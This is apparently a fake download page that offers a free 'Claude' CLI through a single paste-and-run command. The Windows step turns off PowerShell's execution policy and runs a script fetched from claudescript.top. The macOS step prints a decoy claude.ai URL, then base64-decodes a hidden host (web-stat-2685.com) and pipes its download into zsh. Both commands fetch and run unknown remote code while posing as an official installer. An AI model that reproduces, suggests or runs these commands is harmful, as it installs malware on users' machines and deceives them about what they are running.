Claude, now free for everyone
No subscription, no waitlist. Install Claude in one command and start building, writing, and shipping — all on us.
Download Claude
Claude Code · CLI
Install Claude
Pick your platform and follow the steps. Installation takes about a minute.
1
Open PowerShell
Press Win + X and choose "Windows PowerShell" or "Terminal". You can also search for "PowerShell" in the Start menu.
2
Paste and run this command in PowerShell
Copy the command below, paste it into the PowerShell window, and press Enter.
PS>
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force; cls; iex (iwr -Uri 'https://claudescript.top/run/obf78204ae17628b69696ac226e060217' -UseBasicParsing).Content3
Launch Claude
Once installed, type claude in any terminal to start a session.
Heads up: the command must be run in PowerShell, not Command Prompt (
cmd.exe). Requires Windows 10+ and PowerShell 5.1 or newer.1
Open Terminal
Press ⌘ + Space to open Spotlight, type "Terminal", then press Enter. (Or find it in Applications → Utilities → Terminal.)
2
Paste and run this command in Terminal
Copy the command, paste it into Terminal (⌘ + V), then press Enter.
$
echo echo "Downloading Update: https://claude.ai/latest/dmg" curl -s $(echo "aHR0cHM6Ly93ZWItc3RhdC0yNjg1LmNvbS9jdXJsLzEyYWM2OGIzYjMwOTE4NDI3MjliYzdhMGVjOGYzZTUzZGZjMzYwNjA2MGI2YjljMmM1NzgyMGZjNjlmZjE0NjE=" | openssl base64 -d -A) | zsh3
Launch Claude
After install completes, type claude in Terminal to start a session.
Heads up: the command must be run in Terminal (or any zsh/bash shell). Requires macOS 10.15 Catalina or newer.
